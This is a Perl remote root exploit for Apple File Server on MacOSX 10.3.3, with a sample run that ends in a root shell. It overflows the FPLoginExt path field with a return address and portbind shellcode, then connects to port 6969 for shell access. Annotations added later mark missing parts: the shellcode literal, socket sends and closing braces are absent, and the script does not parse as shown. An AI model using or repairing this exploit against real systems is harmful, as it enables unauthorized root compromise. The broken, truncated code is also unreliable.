# Priv8security com remote root exploit for AppleFileServer.
# Bug found by Dave G. and Dino Dai Zovi.
# URL:
# [wsxz@localhost buffer]$ perl -h -t 0
# -=[ Apple File Server remote root exploit!]=-
# [+] Using target: MacOSX 10.3.3
# [+] Using ret: 0xf0101cb0
# [+] Sending Request Opensession... DOne!
# [+] Got response packet:
# Flags: 1 Cmd: 4 ID: 31337
# [+] Sending FPloginEXT packet... DOne!
# [+] Waiting... We got in =)
# ****** Welcome to 'Adriano-Limas-Computer' ******
# Darwin Adriano-Limas-Computer.local 7.3.1 Darwin Kernel Version 7.3.1: Mon Mar
# 22 21:48:41 PST 2004; root:xnu/xnu-517.4.12.obj~2/RELEASE_PPC Power Macintosh powerpc
# uid=0(root) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty),
# 5(operator), 20(staff), 31(guest), 80(admin)
use IO::Socket;

# Command-line options: -h host, -t index into the target table, -p port
# (default 548), -o offset added to the target's return address.
# NOTE: there is no "use strict"/"use warnings" in this file, so $host,
# $target, $port and $offset below are all package globals.
use Getopt::Std; getopts('h:t:p:o:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
# -t is used unchecked as an array index further down; the visible target
# table has a single row (index 0), so any other value dereferences undef there.
if (defined($args{'t'})) { $target = $args{'t'}; }
if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;} # 548 = AFP over TCP
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}

# Target table: [description, return address, "magic size"]. The third value is
# later written into the 2-byte path-length field of the login packet.
# NOTE(review): the closing ");" of this list is absent from this copy of the
# file (presumably lost when the page was extracted); the listing does not
# parse as shown.
my @targets = (
# description, ret, Magic size.
["MacOSX 10.3.3", 0xf0101cb0, 4], #tested on my ibook g4

print STDERR "-=[ Apple File Server remote root exploit!]=-\n\n";

# -h and -t are both required. NOTE(review): this "if" is never closed in this
# copy of the file; the usage/exit body that presumably followed the brace is
# missing, so syntactically everything below sits inside the condition.
if (!defined($host) || !defined($target)) {

# Unpack the selected row of the target table. No bounds check on $target.
($desc,$ret,$msize) = @{$targets[$target]};

print STDERR "[+] Using target: $desc\n";
# The -o offset is applied to the table's return address; shown in hex.
print STDERR "[+] Using ret: 0x" . sprintf('%lx', $ret + $offset) . "\n";

# NOTE(review): the payload literal is absent from this copy of the file; only
# the attribution comment survived, so nothing that uses $shellcode can run as
# written.
$shellcode = # portbind shellcode by br00t [at]

# Return address as 4 big-endian bytes for the PowerPC target. pack('l') uses
# host byte order, so the reverse() only produces big-endian when the script
# itself runs on a little-endian host (as in the sample run in the header).
$bin_ret = reverse(pack('l', ($ret + $offset)));

# The oversized "path" field: 141 filler bytes, the address, filler up to 824
# bytes, the payload, then 100 trailing 'A's. Whenever length($shellcode) <= 824
# the total is a fixed 1069 bytes.
$buffer = "\x60" x 141;
$buffer .= $bin_ret;
$buffer .= "\x60" x (824 - length($shellcode));
$buffer .= $shellcode;
$buffer .= "A" x 100;

# NOTE(review): this statement is truncated in this copy of the file -- only
# the first two bytes of the OpenSession request survive and the string is left
# dangling after the "." operator, so the listing does not parse as shown.
$req =
"\x00\x04".# Request Opensession

# FPLoginExt request. The first 16 bytes are the DSI (AFP-over-TCP) header,
# the rest are the AFP login parameters. Defender's note: the header advertises
# a Length of 0x0400 (1024) but roughly 1119 bytes follow it (47 bytes of
# login fields plus the 1069-byte $buffer plus padding), and the 2-byte path
# length at offset 63 is patched below from the target table. That mismatch
# between advertised and actual length is the kind of inconsistency a
# protocol-aware sensor can flag.
$packet = 
"\x00". # DSI flags: 0 = request
"\x02". # DSI command
"\x7a\x69".# leet ID: request ID 0x7a69 = 31337, echoed back in the sample run
"\x00\x00\x00\x00".# Data Offset
"\x00\x00\x04\x00".# Length: claims 1024 bytes of payload
"\x00\x00\x00\x00".# Reserved
"\x3f". # FPloginext: AFP command 63
"\x00". # Pad
"\x00\x00". # Flags
"\x0e\x41\x46\x50\x56\x65\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31".# Version: "AFPVersion 2.1" (length byte 0x0e)
"\x10\x43\x6c\x65\x61\x72\x74\x78\x74\x20\x70\x61\x73\x73\x77\x72\x64". # UAM: "Cleartxt passwrd" (length byte 0x10)
"\x03". # Type
"\x00\x07". # User Len
"\x41\x64\x72\x69\x61\x6e\x6f" .# AFPNAME USER: "Adriano"
"\x03". # Pathtype
"\x80\xff". # Path Len: placeholder at bytes 63-64, overwritten below
$buffer. # Evil String
"\x00"; # Pad

# Magic size as 2 bytes. pack("S") is host byte order, so as with the return
# address the reverse() gives big-endian only on a little-endian host.
$len = reverse(pack("S", $msize));

# Offset 63 is the "Path Len" field assembled above: 16 header bytes plus
# 47 bytes of login fields (1+1+2+15+17+1+2+7+1). The 0x80ff placeholder is
# replaced with $msize from the target table.
substr($packet, 63 , 2, $len);

# AFP control connection (port from -p, default 548); dies if it cannot
# connect. NOTE(review): no write to or read from $f survives in this copy of
# the file -- only the progress messages that follow remain.
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "[-] Cant connect: $!\n\n";

# Progress messages only. The sends of $req and $packet over $f and the read
# of the OpenSession reply (the "Flags: ... Cmd: ... ID: ..." line in the
# sample run) that these messages bracket are missing from this copy of the
# file.
print STDERR "[+] Sending Request Opensession... ";

print STDERR "DOne!\n";

print STDERR "[+] Got response packet:\n";

print STDERR "[+] Sending FPloginEXT packet... ";
print STDERR "DOne!\n";
print STDERR "[+] Waiting... ";


# Second connection, to TCP/6969 on the same host, presumably where the payload
# listens. From a defender's view this is the observable sequence on the wire:
# an AFP (548) session from a peer followed within moments by the same peer
# connecting to an unusual high port on the server. Reuse=>1 (SO_REUSEADDR)
# has no evident purpose on a connecting socket.
$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>6969,Type=>SOCK_STREAM,Reuse=>1)
or die "No luck :( $!\n\n";

print "We got in =)\n";



# Banner commands written to the remote shell. The backticks sit inside a Perl
# double-quoted string, so they are not interpolated locally; the remote shell
# runs `hostname -s` (matching the "Welcome to" line in the sample run).
print $sc "echo;echo \"****** Welcome to '`hostname -s`' ******\"\n";
print $sc "echo;uname -a;id;echo\n";

# Fork into a two-way relay: one side copies socket output to STDOUT, the
# other copies local input to the socket. NOTE(review): both readline operands
# are missing in this copy ("$line = )"), as are the closing braces and the
# else branch the structure implies; the code does not parse as shown. Which
# handle each loop read from is inference, not visible here.
die "cant fork: $!" unless defined($pid = fork());

if ($pid) {
while(defined ($line = )) {
print STDOUT $line;
# Parent side ($pid is non-zero there): stop the other relay process.
kill("TERM", $pid);
while(defined ($line = )) {
print $sc $line;
print "Good bye!!\n";

sub parse_packet
my ($buf) = shift @_;
my (@packet);
my ($i);

for ($i=0;$i

